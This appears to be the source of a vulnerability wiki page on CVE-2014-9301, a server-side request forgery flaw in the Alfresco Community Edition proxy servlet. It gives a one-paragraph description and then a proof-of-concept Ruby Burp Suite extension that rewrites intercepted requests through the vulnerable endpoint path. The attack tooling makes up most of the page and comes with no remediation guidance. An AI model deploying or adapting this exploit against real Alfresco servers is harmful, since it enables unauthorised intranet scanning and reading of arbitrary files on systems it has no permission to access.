View source for CVE-2014-9301 Alfresco Community Edition before 5.0.a 任意文件讀取漏洞

==INFO==
Server-side request forgery (SSRF) vulnerability in the proxy servlet in Alfresco Community Edition before 5.0.a allows remote attackers to trigger outbound requests to intranet servers, conduct port scans, and read arbitrary files via a crafted URI in the endpoint parameter.

==POC==
<pre>
require 'java'
java_import 'burp.IBurpExtender'
java_import 'burp.IHttpListener'
java_import 'burp.IMessageEditorController'

class BurpExtender
  include IBurpExtender, IHttpListener, IMessageEditorController

  #
  # implement IBurpExtender
  #
  def	registerExtenderCallbacks(callbacks)
	  #@HOST_FROM = 'host1.example.org'
	  #@HOST_TO = 'host2.example.org'
    # obtain an extension helpers object
    @helpers = callbacks.getHelpers()
    # set our extension name
    callbacks.setExtensionName("Traffic redirector")
    # register ourselves as an HTTP listener
    callbacks.registerHttpListener(self)
  end
  #
  # implement IHttpListener
  #
  def processHttpMessage(toolFlag, messageIsRequest, messageInfo)
    # only process requests
    if (messageIsRequest)

      # get the HTTP service for the request
      httpService = messageInfo.getHttpService()

      request = messageInfo.getRequest()
      @root_path = nil unless request.to_s.lines.first.index('endpoint').nil?

      referer = request.to_s.scan(/Referer: (.*)/)
      referer.flatten!
      referer =referer.first.scan(/(\/alfresco\/.*:\d+\/)(.*)/) rescue []
      root_path = referer.flatten.first
      relative_path = "/#{referer.flatten.last}"
      if @root_path.nil? || @root_path.to_s != root_path
        @root_path =root_path unless root_path.nil?
        @relative_path = relative_path unless root_path.nil?
      end
      puts "INSTANCE_ROOT_PATH: #{@root_path}"
      puts "Instance Relative_PATH: #{@relative_path}"
      puts "ROOT_PATH: #{root_path}"
      puts "Relative_PATH: #{relative_path}"
      puts request.to_s.lines.first
      new_req = request.to_s.sub("/alfresco/","/")
      new_req = request if new_req.nil?
      if new_req.to_s.lines.first.count('/')<3
        print "Single dash "
        puts new_req.to_s.lines.first
        unless root_path == relative_path
          rel = @relative_path.split("/")
          rel[-1] = ""
          new_req = new_req.to_s.sub("/", rel.join('/'))
        end
      end

      new_req = new_req.to_s.sub("/", @root_path)
      print "Final request "
      puts new_req

      messageInfo.setRequest(
        @helpers.stringToBytes(new_req)
      )

      # if the host is HOST_FROM, change it to HOST_TO
      #if (@HOST_FROM == httpService.getHost())
      #    messageInfo.setHttpService(
      #      @helpers.buildHttpService(
      #        @HOST_TO,
      #        httpService.getPort(),
      #        httpService.getProtocol()
      #      )
      #    )
      #end
    end
  ensure
    puts '----------------------'
  end

  #
  # implement IMessageEditorController
  # this allows our request/response viewers to obtain details about the messages being displayed
  #
  def getHttpService()
    return @currentlyDisplayedItem.getHttpService()
  end

  def getRequest()
    return @currentlyDisplayedItem.getRequest()
  end

  def getResponse()
    return @currentlyDisplayedItem.getResponse()
  end

	#
  # getter / setters
 	#

  def callbacks
    @callbacks
  end

  def log
    @log
  end

  def requestViewer
    @requestViewer
  end

  def responseViewer
    @responseViewer
  end

  def currentlyDisplayedItem=(currentlyDisplayedItem)
    @currentlyDisplayedItem = currentlyDisplayedItem
  end
end

</pre>